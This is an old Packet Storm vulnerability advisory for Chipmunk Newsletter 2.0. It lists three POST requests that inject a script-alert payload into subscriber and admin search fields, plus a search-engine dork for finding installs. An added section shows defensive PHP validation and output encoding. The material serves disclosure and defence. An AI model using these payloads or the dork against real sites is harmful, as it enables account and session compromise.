Chipmunk Newsletter 2.0 Cross Site Scripting

2010-01-21T00:00:00
ID PACKETSTORM:85452
Type packetstorm
Reporter b0telh0
Modified 2010-01-21T00:00:00

Description

                                        
`# Title: Chipmunk Newsletter XSS Vulnerabilities  
# Date: 01-19-2010  
# Author: b0telh0  
# Software Link: http://www.chipmunk-scripts.com/newsletter/newsletter.zip  
# Version: 2.0  
# Tested on: Windows 7  
  
  
Another XSS on Chipmunk Newsletter...  
Thanks to mr_me who found the first flaw on it!  
  
  
::[ inurl:admin/login.php "Registering Admin" ]::  
  
  
  
1 - http://localhost/sub.php  
  
POSTDATA:  
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit  
  
  
  
2 - http://localhost/admin/addaddress.php  
  
POSTDATA:  
email=<script>alert('xss')</script>&lists=1&submit=submit  
  
  
then we can check it...  
  
  
  
http://localhost/admin/searchaddress.php  
  
POSTDATA:  
theaddress=<script>alert('xss')</script>&submit=submit  
`
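
A defensive counterpart to the three requests above, as an added example that is not part of the original advisory and is not Chipmunk Newsletter's own code. It validates the `email` field on input and HTML-encodes `email` and `theaddress` on output. The function names `clean_email` and `h` are hypothetical, and the way the application stores and renders addresses is assumed, since the page does not show it.

```php
<?php
// Added illustration; not Chipmunk Newsletter source. Function names are hypothetical.

// Input side: for the `email` field posted to sub.php and admin/addaddress.php.
// Returns the address if it is syntactically valid, otherwise null.
function clean_email(string $raw): ?string
{
    $valid = filter_var(trim($raw), FILTER_VALIDATE_EMAIL);
    // Validation narrows what gets stored; it is not a substitute for
    // encoding on output, so h() below is still applied everywhere.
    return $valid === false ? null : $valid;
}

// Output side: for every value written into HTML, whether it came from the
// current request (`theaddress`) or from storage (a subscriber address).
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs: one ordinary address and the advisory's test string.
$samples = [
    'user@example.com',
    "<script>alert('xss')</script>",
];

foreach ($samples as $posted) {
    $email = clean_email($posted);
    if ($email === null) {
        // A rejected value is echoed back only in encoded form.
        echo 'Rejected: ' . h($posted) . PHP_EOL;
        continue;
    }
    // Assumed next step: store $email with a parameterized query.
    echo 'Accepted: ' . h($email) . PHP_EOL;
}

// Search page (admin/searchaddress.php in the advisory): the search term is
// encoded before it is placed in the response, so markup renders as text.
$theaddress = "<script>alert('xss')</script>"; // constructed sample
echo '<p>Results for ' . h($theaddress) . '</p>' . PHP_EOL;
```

Encoding has to happen at every point where a stored address is printed, including the admin pages, because values saved before validation was added remain in the database.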